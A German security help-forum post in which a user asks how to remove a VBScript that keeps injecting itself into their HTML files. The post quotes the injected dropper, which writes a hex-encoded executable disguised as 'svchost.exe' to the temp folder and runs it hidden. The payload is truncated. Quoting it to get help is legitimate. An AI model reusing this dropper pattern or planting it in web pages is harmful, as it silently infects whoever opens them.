Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Java Drive By

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

 
Alt 06.03.2014, 19:38   #1
'itz awzm
 
Java Drive By - Standard

Java Drive By



Moinsen,

ich habe seit kurzem das Problem, dass sich ein Vb-Skript ständig in meine Html Dokumente schreibt. Kenne mich schon ein wenig in der Szene aus und habe mir wohl durch einen Java Drive By etwas eingefangen. Jedenfalls verteilt sich das Teil quer durchs System und auch über die Festplatten. Aber nur in Html Dokumenten. Javascript Dokumente habe ich schon durchgeguckt und konnte nichts finden.

Hier ein Auszug:

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF......."
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

Nun die Frage. Lässt sich da noch was machen, oder sollte ich mein System einmal komplett wieder neu aufsetzen? Mein Kumpel hatte dies auch mal, nur sein Problem war, dass sich der Virus trotz Formatierung, immer neu verteilt hat. Wahrscheinlich wegen den Html Dokumenten.

 

Themen zu Java Drive By
aufsetzen, auszug, dokumente, drive, durchs, festplatte, formatierung, html, java, java drive by, javascript, komplett, konnte, kumpel, kurzem, neu, nichts, platte, problem, svchost.exe, system, trotz, vbscript, virus, wahrscheinlich, wenig




Ähnliche Themen: Java Drive By


  1. Drive by für iPhone?
    Smartphone, Tablet & Handy Security - 22.12.2014 (2)
  2. Erkennt Virustotal.com auch Java Drive by's und..
    Diskussionsforum - 21.10.2014 (7)
  3. Java-Virus (JAVA/Lamar.RI ; JAVA/Jogek.WK usw.)
    Log-Analyse und Auswertung - 18.06.2013 (12)
  4. Nach Verschlüsselungstrojaner viele Virenfunde (JAVA/Jogek.CT; rus JAVA/Agent.MH; JAVA/Dldr.Pesur.BH; W32/Idele.2219; VBS/Fluenza.B; u.a...
    Log-Analyse und Auswertung - 28.01.2013 (1)
  5. JAVA/Dermit.EM, JAVA/Dldr.Lamar.FW, JAVA/Dldr.Themo.F.2, TR/Spy.ZBot.dynb und noch mehr
    Plagegeister aller Art und deren Bekämpfung - 30.11.2012 (22)
  6. Anhaltendes Virenproblem: JAVA/Agent.MN, TR/Spy.ZBot.gfbr.1, EXP/Dldr.Java.D-G, JAVA/Dldr.Rilly.A
    Plagegeister aller Art und deren Bekämpfung - 09.11.2012 (25)
  7. Java-Virus JAVA/Dldr.Dermit.C, JAVA/Dldr.Kara.AB.1, JAVA/Dldr.Karame.AI
    Plagegeister aller Art und deren Bekämpfung - 06.11.2012 (1)
  8. Mehrere Funde! EXP/JAVA.Ternub.Gen - JAVA/Dldr.Small.CI - JAVA/Dldr.OpenC.A - EXP/08-5353.AI.5.A
    Plagegeister aller Art und deren Bekämpfung - 08.08.2012 (29)
  9. Drive-By-Variante von BKA UKash ?
    Plagegeister aller Art und deren Bekämpfung - 05.08.2012 (21)
  10. AKM / BMI Trojaner, OTL via USB-Drive
    Plagegeister aller Art und deren Bekämpfung - 11.06.2012 (1)
  11. Drive by Infektionen auch mit deaktiverten Scripten und Java möglich?
    Diskussionsforum - 13.04.2012 (9)
  12. drive-by Infektion
    Log-Analyse und Auswertung - 06.03.2012 (39)
  13. Internet langsam (Java-Virus JAVA/ClassLoader.AV und Java-Virus JAVA/Exdoer.O)
    Log-Analyse und Auswertung - 01.03.2012 (1)
  14. gen.trojan.heur!ik exploit.java.agent!ik trojan.bat.drive by!ik....
    Plagegeister aller Art und deren Bekämpfung - 24.02.2011 (3)
  15. Drive-by-Installation
    Anleitungen, FAQs & Links - 17.09.2010 (1)
  16. Drive Cleaner
    Plagegeister aller Art und deren Bekämpfung - 15.06.2007 (7)
  17. Drive Cleaner Pop Up
    Log-Analyse und Auswertung - 27.03.2007 (3)

Zum Thema Java Drive By - Moinsen, ich habe seit kurzem das Problem, dass sich ein Vb-Skript ständig in meine Html Dokumente schreibt. Kenne mich schon ein wenig in der Szene aus und habe mir wohl - Java Drive By...
Archiv
Du betrachtest: Java Drive By auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.